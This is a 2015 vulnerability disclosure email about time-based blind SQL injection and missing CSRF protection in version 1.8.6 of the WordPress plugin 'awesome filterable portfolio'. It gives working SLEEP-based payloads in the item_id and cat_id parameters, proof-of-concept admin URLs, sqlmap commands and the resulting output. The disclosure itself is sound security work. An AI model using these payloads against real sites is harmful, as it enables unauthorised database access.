Subject: Blind SQL injection and CSRF for logged administrators in awesome filterable portfolio 1.8.6
Date: Tue, 7 Jul 2015 10:29:48 +0200

Hello,

Plugin: awesome filterable portfolio 1.8.6

Logged administrators can execute arbitrary SQL commands.(there is no CSRF protection).

1. SQL injection (afp_get_new_portfolio_item_page())

Method: GET
Url: http://localhost/wp-admin/admin.php?page=afp_add_new_portfolio_item&item_id=1+and+%28select+sleep%2810%29%29
Vulnerable parameter: item_id

Example PHP callstack:
  afp_get_new_portfolio_item_page   [/awesome-filterable-portfolio/afp.php:240]
  wpdb::get_row 

Sqlmap verification:

sqlmap --dbms mysql --cookie "..." -u "http://localhost/wp-admin/admin.php?page=afp_add_new_portfolio_item&item_id=1" -p item_id

...
Parameter: item_id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: page=afp_add_new_portfolio_item&item_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))EXyJ)
...



2. SQL injection (afp_get_new_category_page())

Method: GET
Url: http://localhost/wp-admin/admin.php?page=afp_add_new_category&cat_id=1+and+%28select+sleep%285%29%29
Vulnerable parameter: cat_id

Example PHP callstack:
  afp_get_new_category_page   [/awesome-filterable-portfolio/afp.php:492]
  wpdb::get_row

Sqlmap verification:

sqlmap --dbms mysql --cookie "..." -u "http://localhost/wp-admin/admin.php?page=afp_add_new_category&cat_id=1" -p cat_id

...
Parameter: cat_id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: page=afp_add_new_category&cat_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ZQyD)
...


--
Regards,
Marcin Probola,
https://wordpress.org/plugins/awesome-filterable-portfolio/